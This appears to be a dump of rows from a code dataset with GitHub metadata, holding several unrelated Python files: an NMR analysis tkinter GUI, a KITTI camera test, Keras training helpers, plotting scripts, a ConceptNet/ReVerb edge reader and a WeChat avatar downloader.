self.axes_glue.set_xlabel(r'$\nu$ (MHz)')
self.axes_glue.set_ylabel('Signal (A.U.)')
legend = self.axes_glue.legend(loc='lower right')
self.axes_glue.grid()
#draggable vline event
def Drag(event):
'''Allows dragging of the markers for fit range on spectrum plot'''
if event.button == 1 and event.inaxes != None:
#find the index of selected points
self.fit_range_l_var.set(np.searchsorted(self.trace.fr_list, event.xdata, side='right'))
#print(self.fit_range_l_var.get())
#self.range_l_select = int(event.xdata)
#update plot
self.axes_vline_l.set_xdata(event.xdata)
self.fig_spc.canvas.draw()
if event.button == 3 and event.inaxes != None:
#find the index of selected points
self.fit_range_r_var.set(np.searchsorted(self.trace.fr_list, event.xdata, side='left'))
#print(self.fit_range_r_var.get())
#self.range_r_select = int(event.xdata)
#update plot
self.axes_vline_r.set_xdata(event.xdata)
self.fig_spc.canvas.draw()
self.axes_vline_drag = self.fig_spc.canvas.mpl_connect('motion_notify_event', Drag)
class Frame_plot_spc_frvt(tk.Frame):
'''T1vT trend plotting'''
def __init__(self, parent, trace):
'''makes the subframe and fills it up'''
tk.Frame.__init__(self, parent)
self.pack(side='left', anchor='n')
#reference to parent
self.parent = parent
#reference to current series
self.trace = trace
#counter for plots
self.counter = 0
#load widgets
self.Widgets()
def Widgets(self):
'''Builds all the subframes and canvases'''
#button commands
def Confirm(event=None):
'''Confirm the selection in this screen'''
#unpack, dont destroy untill series is done, in case corrections are needed
self.parent.temperatures.wait.set(False)
self.pack_forget()
self.destroy()
plt.close('all')
self.parent.traces.button_show.config(state='normal')
#split in columns
self.frame_plot_left = tk.Frame(self)
self.frame_plot_left.pack(side='left', anchor='n')
self.frame_plot_right = tk.Frame(self)
self.frame_plot_right.pack(side='left', anchor='n')
#plot frames
self.frame_plot1 = tk.Frame(self.frame_plot_left, bd=5)
self.frame_plot1.pack(side='top', anchor='n')
self.frame_plot2 = tk.Frame(self.frame_plot_right, bd=5)
self.frame_plot2.pack(side='top', anchor='n')
self.frame_plot3 = tk.Frame(self.frame_plot_right, bd=5)
self.frame_plot3.pack(side='top', anchor='n')
#buttons frame
self.frame_buttons = tk.Frame(self.frame_plot_right, bd=5)
self.frame_buttons.pack(side='top', anchor='e')
#T1 plot
self.fig_t1vt = plt.figure(dpi=100, figsize=(7,4.5))
self.fig_t1vt.subplots_adjust(bottom=0.12, left= 0.11, right=0.96, top=0.94)
self.canvas_t1vt = FigureCanvasTkAgg(self.fig_t1vt, self.frame_plot1)
self.canvas_t1vt._tkcanvas.pack()
#fr plot
self.fig_fr = plt.figure(dpi=100, figsize=(7,2.5))
self.fig_fr.subplots_adjust(bottom=0.18, left= 0.11, right=0.96, top=0.90)
self.canvas_fr = FigureCanvasTkAgg(self.fig_fr, self.frame_plot2)
self.canvas_fr._tkcanvas.pack()
#stretch plot
self.fig_r = plt.figure(dpi=100, figsize=(7,2.5))
self.fig_r.subplots_adjust(bottom=0.18, left= 0.11, right=0.96, top=0.90)
self.canvas_r = FigureCanvasTkAgg(self.fig_r, self.frame_plot3)
self.canvas_r._tkcanvas.pack()
#add button to confirm selection
self.button_confirm = ttk.Button(self.frame_buttons, text='Confirm', command=Confirm)
self.button_confirm.pack(side='right')
self.button_confirm.bind('<Return>', Confirm)
#plot the stuff
self.Fill_plot()
#add button to export parameters
self.button_export = ttk.Button(self.frame_buttons, text='Export CSV', command=self.Export)
self.button_export.pack(side='right')
def Add_trace(self, trace):
'''Adds traces to plots using given trace'''
#initialize lists
x = list()
fr = list()
width = list()
amp = list()
for temp in self.trace:
if self.trace[temp].analysed and not self.trace[temp].disabled:
x.append(self.trace[temp].temp_set)
#maby calculate some center frequency at some point?
fr.append(self.trace[temp].fr)
width.append(self.trace[temp].width)
amp.append(self.trace[temp].fit_params[1])
name = self.trace[temp].file_key
#sort by temperature
sorting = np.argsort(x)
x = np.array(x)[sorting]
fr = np.array(fr)[sorting]
width = np.array(width)[sorting]
amp = np.array(amp)[sorting]
#draw trace
self.axes_1.plot(x, fr, 'bo', color=colors[self.counter],
label=self.parent.current_trace, linestyle='dashed')
self.axes_2.plot(x, fr, 'bo', color=colors[self.counter],
label=self.parent.current_trace, linestyle='dashed')
self.axes_3.plot(x, 2*width, 'bo', color=colors[self.counter],
label=self.parent.current_trace, linestyle='dashed')
#save for export
self.data = dict()
self.data['T'] = x
self.data['fr'] = fr
self.data['FWHM'] = 2*width
self.data['amp'] = amp/np.pi/width
#increase plot counter
self.counter += 1
def Export(self):
'''Saves the plotted data into a CSV file for further analysis'''
file_name = self.parent.current_trace + '.csv'
file_directory = os.path.join('data', self.parent.current_experiment, 'csv', 'spc')
#make the csv folder for old experiments
try:
os.mkdir(file_directory)
except: pass
#write file
with open(os.path.join(file_directory, file_name), 'w', newline='') as f:
writer = csv.writer(f, delimiter=';')
#name row
writer.writerow(['T(K)', 'fr(MHz)','FWHM(MHz)','amplitude'])
#data
for i in range(len(self.data['T'])):
row = [self.data['T'][i], self.data['fr'][i], self.data['FWHM'][i], self.data['amp'][i]]
writer.writerow(row)
tk.messagebox.showinfo('Export complete', 'The file was saved as '+file_name)
def Fill_plot(self):
'''Creates the plots for T1vT'''
self.axes_1 = self.fig_t1vt.add_subplot(111)
self.axes_1.set_xscale('log')
#self.axes_1.set_yscale('log')
self.axes_1.set_title('Frequency temperature dependence')
self.axes_1.set_xlabel('Temperature (K)')
self.axes_1.set_ylabel(r'Frequency (MHz)')
#self.axes_1.legend(loc='lower right')
self.axes_1.grid()
self.axes_2 = self.fig_fr.add_subplot(111)
self.axes_2.set_title('Frequency temperature dependence')
self.axes_2.set_xlabel('Temperature (K)')
self.axes_2.set_ylabel('Frequency (MHz)')
#self.axes_2.get_yaxis().get_major_formatter().set_useOffset(False)
self.axes_2.margins(0.05, 0.1)
self.axes_2.grid()
self.axes_3 = self.fig_r.add_subplot(111)
self.axes_3.set_title('Linewidth')
self.axes_3.set_xlabel('Temperature (K)')
self.axes_3.set_ylabel('Linewidth')
#self.axes_3.get_yaxis().get_major_formatter().set_useOffset(False)
self.axes_3.margins(0.05, 0.1)
self.axes_3.grid()
class Main_application(tk.Frame):
'''Main application calling all the sub sections'''
def __init__(self, parent, *args, **kwargs):
'''Initializes the main application as a frame in tkinter'''
#check for computers screen resolution
width_px = root.winfo_screenwidth()
height_px = root.winfo_screenheight()
if width_px < 1720:
self.Warn_resolution()
tk.Frame.__init__(self, parent, height=1020, width =1720, *args, **kwargs)
self.parent = parent
# sets the window title
self.parent.wm_title('NMR data analysis and overview')
#sets the window minimal size
self.parent.minsize(width=1880, height=770)
# allow editing the exit command
self.parent.protocol('WM_DELETE_WINDOW', self.On_close)
#makes the window strechable
self.pack(fill='both', expand=True)
self.pack()
#place to save Experiment_data classes
self.Open_data()
#calls subframes and packs them
self.Sub_frames()
def Open_data(self):
'''Opens all experiments from folders data subdirectory'''
self.data = dict()
#adds the existing experiments
if os.path.isdir('data'):
for entry in os.scandir('data'):
if entry.is_dir():
#initiates a dict of the experiment data classes
self.data[entry.name] = Experiment_data(entry.name)
#makes the raw experiment folder
else:
msg = 'The current directory does not contain the correct file structure.' \
'\nCreate new folders in current directory?'
if tk.messagebox.askyesno('No data in current directory', msg):
os.mkdir('data')
def Sub_frames(self):
'''Creates all the subframes and positions them'''
#first column
self.experiments = Frame_experiments(self)
#self.experiments.pack(side='left', fill='y')
#second column
self.traces = Frame_traces(self)
#self.traces.pack(side='left', fill='y')
#3rd column
self.temperatures = Frame_temperatures(self)
#self.temperatures.pack(side='left', fill ='y')
## construct it every time instead (to avoid memory problems)
#4th column, plotter
class Tracer():
pass
#self.plot1 = Frame_plot_T1_view(self, Tracer)
#temporary pack
#self.plot1.pack(side='left', fill='both', expand=True)
def On_close(self):
'''Actions to execute when the master window is closed with ('X')'''
msg = 'Are you sure you want to close the program?\n' \
'Unsaved data will be lost!'
if tk.messagebox.askokcancel('Quit', msg):
#close all plots and figures
plt.close('all')
self.parent.destroy()
def Warn_resolution(self):
'''Warns the user that the resolution of the program is not optimal for the monitor'''
msg = 'The resolution of the program is larger than the resolution of the monitor!\n' \
'The program might not function or appear properly!'
tk.messagebox.showerror('Error', msg)
#implement parameters for smaller figure sizes to account for smaller resolution!!
def Error_incomplete():
'''Lets user know that the content doesnt exist yet'''
tk.messagebox.showerror('Error', 'The function is not yet implemented!')
def Quit_program():
'''destroys root and quits the tkinter'''
root.destroy()
if __name__ == '__main__':
'''Initializes tkinter and main application if this is a standalone file'''
root = tk.Tk()
Main_application(root)
root.mainloop()
| [
"noreply@github.com"
] | noreply@github.com |
e4d3d004e7b938a470815cf4ee2286e25d8d3eef | cbe65c1f19e869d953c5dac0b103e9cd9cb47c2c | /dataset_preparation/test_cameras.py | 54ff5816efb1849593a842d600cf3bf4bf8e3154 | [
"MIT"
] | permissive | aTeK7/deep-stereo1.4 | 997148e3cde0eaf3537e2b1df15eda7974ccdb51 | dd2150097d0ed1c05791e4d80cf9b404f98a6880 | refs/heads/master | 2021-05-12T18:22:46.757206 | 2018-01-11T07:44:48 | 2018-01-11T07:44:48 | 117,065,516 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,107 | py | import numpy as np
np.set_printoptions(suppress=True)
import unittest
from kitti_camera import KittiCamera
from kitti_generator import KittiGenerator, extract_multipatch
from reprojection.reprojection import Reprojection
from scipy import misc
import timeit
import matplotlib.image as mpimg
from dataset_preparation.set_generator import SetGenerator
import os
class CameraParserTest(unittest.TestCase):
sequences_path = "/Volumes/Bahia/kitti-dataset/sequences"
calibration_path = "/Volumes/Bahia/kitti-dataset/calibration"
dataset_path = "/Volumes/Bahia/kitti-dataset"
def test_parse_kitti(self):
sequence = "00"
camera = 0
kittiCams = KittiCamera(self.calibration_path, sequence)
cam0 = kittiCams.getCamera(0)
cam1 = kittiCams.getCamera(1)
cam2 = kittiCams.getCamera(2)
cam3 = kittiCams.getCamera(3)
def test_kitti_generator(self):
kittiGen = KittiGenerator(self.sequences_path)
# print kittiGen.sequence_names
# print kittiGen.sq_len
# print kittiGen.sq_dimensions
sq_num, subset = kittiGen.generate_set()
# print subset
patches = kittiGen.generate_patch(sq_num)
# print patches
def test_kitti_camera_depth_plane(self):
kittiCams = KittiCamera(self.calibration_path, "00")
cam_original = kittiCams.getCamera(0)
cam_virtual = kittiCams.getCamera(1)
# reprojection object
r = Reprojection(cam_original, cam_virtual)
# generate set
kittiGen = KittiGenerator(self.sequences_path)
sq_num, subset = kittiGen.generate_set()
# print subset
start_time_read = timeit.default_timer()
image_set = [
misc.imread(subset[0]),
misc.imread(subset[1]),
misc.imread(subset[2]),
misc.imread(subset[3]),
misc.imread(subset[4])
]
start_time = timeit.default_timer()
patches = kittiGen.generate_patch(sq_num)
patch_set = MultiprocessorExtractor(image_set, patches, r).generate_planes()
elapsed = timeit.default_timer() - start_time
# print "Elapsed time to extract 96 depth planes X 4 cameras: %.2f seconds" % elapsed
elapsed = timeit.default_timer() - start_time_read
# print "Elapsed time with image read: %.2f seconds" % elapsed
# print len(patch_set)
#plt.imshow(result)
#plt.show()
def test_multipatch_generation(self):
set_gen = SetGenerator(os.path.join(self.dataset_path, 'sequences'))
patches = set_gen.generate_patch("00")
for key in patches:
print("Patch key: %s" % key)
patch = patches[key]
print("TL:%s BR:%s" % (patch[0], patch[1]))
center = (patch[0][0] + key / 2, patch[0][1] + key / 2)
print("Center: (%s,%s)" % center)
# print(patches)
image = mpimg.imread('/Volumes/Bahia/kitti-dataset/sequences/00/image_2/000000.png')
extracted = extract_multipatch(image, patches)
print("Done")
| [
"sorous.hrezaei7@gmail.com"
] | sorous.hrezaei7@gmail.com |
2aa69b4a3ff0de990419e6744aa990e0df63fe3d | 8095e922b65c5bd196f7a2a491d0e0c015ffbc9f | /src/accounts/urls.py | aaadbe67bcdd87ddce2de1034d674cff7ac4835f | [] | no_license | raheemazeezabiodun/django-react-redux-blog | 8f016c4846c849752b113bc0c0fee073853c3bc9 | 21bcfcff819f52b7349f1d052befb335784fad78 | refs/heads/master | 2020-03-07T05:22:03.813640 | 2018-04-07T18:13:53 | 2018-04-07T18:13:53 | 127,293,885 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 226 | py | from django.conf.urls import url
from django.utils.translation import ugettext_lazy as _
import accounts.views
urlpatterns = [
url(_(r'^login/$'),
accounts.views.UserLoginView.as_view(),
name='login'),
]
| [
"raheemazeez4@gmail.com"
] | raheemazeez4@gmail.com |
483bf82cc9e82d120ce08aa7b02284817733f6c4 | c0dca52ecced3a1d5db3a97a196b3ca3aa45033e | /utils/model_solver.py | 1143bf125d1a2608799032e12fcd9861645edb12 | [
"MIT"
] | permissive | wesley1001/tsc | 607226b32af5d20926c4403d4c3392d9d2bd0689 | fd0eb3dc50685b91d5926053e32ce4c8211738b3 | refs/heads/master | 2021-05-17T07:33:26.237783 | 2020-03-21T13:36:32 | 2020-03-21T13:36:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,798 | py | ##+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
## Created by: Haihao Zhu
## ShanghaiTech University
## zhuhh2@shanghaitech.edu.cn
## Copyright (c) 2019
##
## This source code is licensed under the MIT-style license found in the
## LICENSE file in the root directory of this source tree
##+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
import tensorflow as tf
import time
import numpy as np
import pandas as pd
class Solver(object):
def __init__(self, opt, model, dataset_name, num_classes):
self.opt = opt
self.model = model
self.dataset_name = dataset_name
self.num_classes = num_classes
def fit(self, train_data, test_data, optimizer, criterion, callbacks, metric):
# train
start_time = time.time()
""" low level handling, not working for now, use build-in training process instead.
for ep in range(self.opt.train.num_epochs):
print("epoch {0} training start".format(ep))
for step, (x, y) in enumerate(train_data):
#print(y.shape)
with tf.GradientTape() as tape:
logits = self.model(x)
loss = criterion(y, logits)
grads = tape.gradient(loss, self.model.trainable_weights)
optimizer.apply_gradients(zip(grads, self.model.trainable_weights))
#print(y, logits)
train_metric(y, logits)
if step % 5 == 0:
print('loss of step {0} is {1}'.format(step, loss.numpy()))
print('acc of step {0} is {1}'.format(step, train_metric.result().numpy()))
print('training acc of epoch {0} is {1}'.format(ep, train_metric.result().numpy()))
"""
# built-in training process
#x_train, y_train = train_data
self.model.compile(optimizer=optimizer, loss=criterion, metrics=[metric])
#self.model.fit(x_train, y_train, batch_size=self.opt.train.batch_size, validation_split=0.2, epochs=self.opt.train.num_epochs)
history = self.model.fit(train_data, validation_data=test_data, epochs=self.opt.train.num_epochs, callbacks=callbacks)
end_time = time.time()
duration = end_time - start_time
print('duration of training dataset {0} is {1}'.format(self.dataset_name, duration))
print('min validate accuracy: {0}'.format(np.max(history.history['val_categorical_accuracy'])))
res = pd.DataFrame(history.history)
res.to_csv()
def save(self):
pass
def predict(self):
pass
def evaluate(self, test_data):
# use best model in training process
results = self.model.evaluate(test_data)
print('test loss, test acc:', results) | [
"2712079998@qq.com"
] | 2712079998@qq.com |
6555482bf26bf64908bb088cc87f0d66e92b40ee | 9bf8877b6f6b4061982cd8afc1c8643e72d29e53 | /LearnPythonHardWay/ex25Practice.py | 602ee134d8eae7fd48ff81e261d3b32fb0911576 | [] | no_license | Jonaz80/PythonProjects | e6960b2a3f776581d62a328517b70ee8ee678a06 | 30be350703437d9dc60ac9a49bc0f018ccef55b5 | refs/heads/master | 2020-04-11T23:26:53.330378 | 2019-08-14T20:28:54 | 2019-08-14T20:28:54 | 162,167,199 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 769 | py | def break_words(stuff):
words = stuff.split(' ')
return words
def sort_words(words):
return sorted(words)
# do this with words.sorted?
def print_first_word(words):
word = words.pop(0)
print(word)
def print_last_word(words):
word = words.pop(-1)
print(word)
def sort_sentence(sentence):
#uses other functions to split and sort words in a sentence
words = break_words(sentence)
return sort_words(words)
def print_first_and_last(sentence):
words = break_words(sentence)
print_first_word(words)
print_last_word(words)
def print_first_and_last_sorted(sentence):
words = break_words(sentence)
words = sort_words(words)
print_first_word(words)
print_last_word(words)
| [
"noreply@github.com"
] | noreply@github.com |
f4fdc569715d0ecd60411afc6fbe30af9fcaa8c2 | 513c2b96e2bfceb911cf4b4fc42cc8a34653dbc8 | /layers/core.py | 0cf99ade60664d6839b92851a76f6c10c4114fa3 | [] | no_license | iiharu/NN | 171ff9852720a76311a728cbf08beb48162d4327 | dc982bdbd6c8ef122068da15a98877c827ab06c6 | refs/heads/master | 2020-04-16T23:39:02.337343 | 2019-06-28T05:00:25 | 2019-06-28T05:00:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,089 | py | # -*- coding: utf-8 -*-
import tensorflow as tf
from tensorflow import keras
def dense(units, activation=None, use_bias=True,
kernel_initializer='glorot_uniform', bias_initializer='zeros',
kernel_regularizer=None, bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None, bias_constraint=None,
**kwargs):
return keras.layers.Dense(units, activation=activation, use_bias=use_bias,
kernel_initializer=kernel_initializer, bias_initializer=bias_initializer,
kernel_regularizer=kernel_regularizer, bias_regularizer=bias_regularizer,
activity_regularizer=activity_regularizer,
kernel_constraint=kernel_constraint, bias_constraint=bias_constraint,
**kwargs)
def dropout(rate, noise_shape=None, **kwargs):
return keras.layers.Dropout(rate, noise_shape=noise_shape, **kwargs)
def flatten(**kwargs):
return keras.layers.Flatten(**kwargs)
| [
"iiharu@alumni.tus.ac.jp"
] | iiharu@alumni.tus.ac.jp |
90ffb9bbf344668c0902be78a49dfc17a1a3605d | 85a758eb440e748add42fd90ae6097d7b200e140 | /nsl/go/__about__.py | 26d1b01ca1275bb0cc742e59c18a95df598057ea | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | newskylabs/nslgo | af9b435fb897866049dd646137d9c9598ed5abcc | c5570b31fbd3febd4e9f75bdeba5b12d62d185d8 | refs/heads/master | 2020-05-02T16:25:32.354595 | 2019-05-02T21:47:52 | 2019-05-02T21:47:52 | 178,067,840 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,864 | py | ## =========================================================
## Copyright 2019 Dietrich Bollmann
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
## ---------------------------------------------------------
## =========================================================
## Package metadata
## ---------------------------------------------------------
__all__ = [
'__package_name__',
'__version__',
'__status__',
'__description__',
'__author__',
'__authors__',
'__maintainer__',
'__email__',
'__contact__',
'__copyright__',
'__url__',
'__license__',
'__date__',
]
__package_name__ = 'nslgo'
__version__ = '0.0.1.dev1'
__status__ = 'Development'
__description__ = 'NewSkyLabs Python project {}'.format(__package_name__)
__author__ = 'Dietrich Bollmann'
__authors__ = [__author__]
__maintainer__ = __author__
__email__ = 'dietrich@newskylabs.net'
__contact__ = __email__
__copyright__ = 'Copyright 2019 {}'.format(__author__)
__url__ = 'http://newskylabs.net/python/packages/{}'.format(__package_name__)
__license__ = 'Apache License 2.0, http://www.apache.org/licenses/LICENSE-2.0'
__date__ = '2019/04/12'
## =========================================================
## =========================================================
## fin.
| [
"dietrich@newskylabs.net"
] | dietrich@newskylabs.net |
65467841df68300d6c0d6331f26a0ff5ead3bc36 | aa5ed4ac7ca3a466c9a813a7b1571bd1640819f1 | /unittest/test_data_generator_m.py | c3a2e2341cd6640696a0bbb2e973f517d8c6fe75 | [] | no_license | jason157/data_analysis | 8335b0de7aae1bcda379559f18d84968a18f1078 | 1d2cb53266b39d9cd2868ece3e96844fac02c937 | refs/heads/master | 2022-12-20T14:44:01.140737 | 2020-09-25T13:33:26 | 2020-09-25T13:33:26 | 297,929,257 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 390 | py | import unittest
from src.data_generator_m import main
class MultiDataGenTestCase(unittest.TestCase):
def test_data_generator_m(self):
dataset_type = "source"
quantity = 50
save_file_name = "../data/test.txt"
argv = ("test_data_generator_m.py", dataset_type, quantity, save_file_name)
main(argv)
if __name__ == '__main__':
unittest.main()
| [
"jason157@126.com"
] | jason157@126.com |
009e557a57f43a23f7987f49b59cdcb9458f5f72 | a14b57c49b77456b2bb568a3539cd6df0b0b3338 | /01 Download_HeadImages.py | f891691c95dc145ad3a9183f0c6affa173fd01c6 | [] | no_license | WillemChan/GreetingCards-to-WeChat-Friends | c5549ccf8d2d732ea3619ecf229529af2945ad8a | e735e022d9e7b4f5d76b4ee14c7758abcb706fb3 | refs/heads/master | 2020-04-15T01:55:32.591346 | 2019-01-17T10:21:19 | 2019-01-17T10:21:19 | 164,296,530 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,032 | py | import itchat
import os
def dld_hImages(outdir):
# Get the QR code to log in to the web version of WeChat
itchat.auto_login()
friends = itchat.get_friends(update=True)[0:]
print(len(friends)) # Get the number of friends
user = friends[0]["NickName"][0:]
path = outdir # Input your path here that you want to store HeadImages.
os.mkdir(path)
os.chdir(path)
os.getcwd() # Get the path
for i in friends[1:len(friends)]: # 不从0开始的原因是friends[0]是账户本人
try:
i['img'] = itchat.get_head_img(userName=i["UserName"])
i['ImgName'] = i["RemarkName"][0:] + ".jpg"
except ConnectionError: # Network disconnection will cause an error
print('get '+i["RemarkName"][0:]+' fail')
fileImage = open(i['ImgName'], 'wb')
fileImage.write(i['img'])
fileImage.close()
if __name__ == "__main__":
dld_hImages('C:/Users/Willem/Jupyter_Exercise/sending_pictures/headImages_bef')
print('头像下载完毕')
| [
"Williamsstorm@outlook.com"
] | Williamsstorm@outlook.com |
8d7c6c7fe158a77d2d2ea97fae0cd38889c2106b | 424213d62d7e88a907bfc30b52cef61f6d4b95b7 | /007 - 10001st prime/007.py | 782b2a4aea5e439253af3db6bb0ab02c2f98d2cb | [] | no_license | David-Jackson/project-euler-solutions | ae1b3e88987c4e428be046cb6d9562995e0e0298 | 5ba9d9914f6d170110c4f9b533357c167b9f986d | refs/heads/master | 2021-01-19T10:43:04.444228 | 2017-03-15T18:29:51 | 2017-03-15T18:29:51 | 82,206,092 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 359 | py |
def is_prime(n):
if (n <= 1):
return False
if (n <= 3):
return True
limit = int(n**(.5))
for i in range(2, limit + 1):
if (n % i == 0):
return False
return True
i = 1
i_prime = 2
n = 3
while (i < 10001):
if (is_prime(n)):
i += 1
i_prime = n
n += 2
print "Answer:", i_prime
| [
"jack8679@kettering.edu"
] | jack8679@kettering.edu |
0e1842795d299b5058a649381cc355508b4f59e8 | ead56091e5a1459d5ffb508742fe4c43b7ceae9c | /DiscreteSys/cobweb.py | 99181ddab823af3bc3f917ee3043191de4b1dc02 | [] | no_license | CPSC-SMC/MathModeling | 40dd5ae59b7f58e07bc73b8a7dbec28ce4949da0 | c7b6ac01a68e82d634ff2152d4f7c279e9d12296 | refs/heads/master | 2016-09-10T04:29:32.289030 | 2014-12-08T17:52:49 | 2014-12-08T17:52:49 | 18,861,418 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,242 | py | # -*- coding: utf-8 -*-
"""
Cobweb plot
@author: sbroad
"""
import numpy as np
import matplotlib.pyplot as plt
def cobweb(x0, f, ginv = lambda x: x, n = 20):
"""
Produces a cobweb plot of f vs. g (default g(x)=x))
f ---> the function with a fixed/equilibrium point
ginv ---> the inverse of the function against which to find equilibrium
---> default ginv is identity map
n ---> the number of cobweb iterations to use (default 20)
"""
x = [x0]
y = [f(x0)]
for i in range(n):
q = x[-1]
newq = ginv(f(q))
x.append(newq)
x.append(newq)
y.append(f(q))
y.append(f(newq))
plt.plot(x, y, 'k--', label = 'cobweb')
return [min(x), max(x), min(y), max(y)]
def supply(p):
return 2*p+10
def demand_price(x):
return 100./x
plt.close()
lims = cobweb(12, demand_price, ginv = supply)
x = np.linspace(lims[0] - 1, lims[1] + 1, 21)
y = np.linspace(lims[2] - 1, lims[3] + 1, 21)
plt.plot(supply(y), y, label = 'supply')
plt.plot(x, demand_price(x), label = 'demand')
plt.title('Cobweb plot of supply vs. demand')
plt.xlabel('Quantity produced / purchased')
plt.ylabel('Price')
plt.legend(loc='best')
| [
"sbroad@saintmarys.edu"
] | sbroad@saintmarys.edu |
28e1ce89031c317ca92663f63da50fac4b3c0ef4 | 5f1ecf84de54db5ae8eb6cb35d56a40210a5431c | /cnet5_index_builder/cnet5-data/reverb/read_reverb.py | 955739c555bad83c3d9902c492a696e16690ef0c | [] | no_license | Web5design/conceptnet5 | 5afbdfc47316b0472305b6f3084e9abc062aff97 | e93cb933b59f1b190007b62f9c1ac1966c2fa35f | refs/heads/master | 2021-01-18T06:03:02.460091 | 2013-08-07T17:55:47 | 2013-08-07T17:55:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,470 | py | import codecs, string
import json
import sys
import os
from metanl.english import normalize
from conceptnet5.nodes import make_concept_uri
from conceptnet5.edges import make_edge, MultiWriter
#from file_chunk_processor import FileChunkProcessor
# Unfortunately, the current file contains a mix of normalized and unnormalized
# output, based on the way things worked in the beta of ConceptNet 5. In fact,
# we have to combine both of them to get all the relevant information.
#
# We should develop a better process for this, but right now we will assume
# that a normalized and unnormalized statement are related if they have the
# same floating-point number as their score and appear adjacent in the file.
REVERB_FILES = ['raw_data/reverb_featured_triples.txt']
def output_edge(obj,writer):
objsource = obj['sources'][0]
if obj['arg1'].startswith(objsource):
obj['arg1'] = objsource
if obj['arg2'].startswith(objsource):
obj['arg2'] = objsource
if obj['arg1'].endswith(objsource):
obj['arg1'] = objsource
if obj['arg2'].endswith(objsource):
obj['arg2'] = objsource
start = make_concept_uri(obj['arg1'], 'en')
end = make_concept_uri(obj['arg2'], 'en')
if obj['rel'][0] in string.uppercase:
rel = '/r/'+obj['rel']
else:
rel = make_concept_uri(obj['rel'], 'en')
if start.startswith('/c/en/this_') or start.startswith('/c/en/these_') or end.startswith('/c/en/this_') or end.startswith('/c/en/these_'):
return
context = make_concept_uri(objsource, 'en')
source = "/s/web/en.wikipedia.org/wiki/%s" % (objsource.replace(' ', '_'))
rules = ['/s/rule/reverb', '/s/rule/reverb_filter_apr2012']
surfaceText = u"[[%s]] %s [[%s]]" % (obj['arg1'], obj.get('surfaceRel', obj['rel']), obj['arg2'])
weight = float(obj['weight']) ** 3 / 2
edge = make_edge(rel, start, end,
dataset='/d/reverb/wp_frontpage',
license='/l/CC/By-SA',
sources=[source] + rules,
context=context,
surfaceText=surfaceText,
weight=weight)
writer.write(edge)
def handle_lines(lines,writer):
current_obj = None
current_score = None
for line in lines:
line = line.strip()
if line and not line.startswith('['):
obj = json.loads(line)
if current_obj is None:
current_obj = obj
current_score = obj['weight']
obj['surfaceRel'] = obj['rel']
elif obj['weight'] == current_score:
if normalize(obj['arg1']) == normalize(current_obj['arg1']) and normalize(obj['arg2']) == normalize(current_obj['arg2']):
current_obj['rel'] = obj['rel']
output_edge(current_obj,writer)
current_obj = None
current_score = None
else:
if current_obj is not None:
output_edge(current_obj,writer)
current_obj = obj
current_score = obj['weight']
obj['surfaceRel'] = obj['rel']
if current_obj is not None:
output_edge(current_obj,writer)
writer.close()
if __name__ == '__main__':
writer = MultiWriter('reverb-wp-frontpage')
for file_to_read in REVERB_FILES:
lines = codecs.open(file_to_read, encoding='utf-8', errors='replace')
handle_lines(lines,writer)
| [
"digitial-intuition@digitialintuition-Inspiron-620.(none)"
] | digitial-intuition@digitialintuition-Inspiron-620.(none) |
9ae8d7ce445ae3cc95832b024c28c453579539ec | 2b7c7e9b00ed9b2dbbac943ee4b79865a96d10de | /Figure_script/Figure_Sobol_env_heatmap.py | c9d4513a3b6f3d83f0f93bf2429b86ad119e7dbf | [] | no_license | YaojieLu/Plant_traits_inversion | ad973e60bb32717d9d718f774c2ec77433c38ced | ec83642ae2a2e6ef96502e58f8074bffdadfefe8 | refs/heads/master | 2021-06-21T15:22:00.225498 | 2020-12-13T22:12:21 | 2020-12-13T22:12:21 | 140,017,309 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,163 | py |
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
# import data
df = pd.read_csv('../Results/Sobol_env.txt', sep = ',', index_col = 0)
df = df[df['T'] == 30]
df['D'] = round(df['D'], 4)
# labels
paras = ['c', 'L', 'p50', 'ps']
latex = ['$\\mathit{c}$', '$\\mathit{L}$',
'$\\psi_{x50}$', '$\\psi_{s}$']
labels = dict(zip(paras, latex))
# figure
sns.set(font_scale = 1.3)
fig = plt.figure(figsize = (16, 16))
for i in range(len(paras)):
ax = fig.add_subplot(2, len(paras)/2, i+1)
df_para = df.pivot(index = 'I', columns = 'D', values = paras[i])
sns.heatmap(df_para, cmap = 'viridis', xticklabels = 3, yticklabels = 3)
#plt.xlim
#plt.ylim([0, 1])
if i > 1:
plt.xlabel('$\\mathit{D}$', fontsize = 20)
else:
ax.axes.get_xaxis().set_visible(False)
if i == 0 or i == 2:
plt.ylabel('$\\mathit{I}$', fontsize = 20)
else:
ax.axes.get_yaxis().set_visible(False)
plt.title(labels[paras[i]], fontsize = 20)
plt.tight_layout
plt.subplots_adjust(wspace = 0, hspace = 0.15)
plt.savefig('../Figures/Figure Sobol_env_heatmap.png', bbox_inches = 'tight')
| [
"="
] | = |
55a9e15caa3390bc0770bedd2dfc2dc21ce45dea | 43204546c687d7ec6bba04dc925eb07fc3f938e7 | /angrdbg/server.py | 478c2e72b3c3c6f84679b0c78a5ca6077afea852 | [
"BSD-2-Clause"
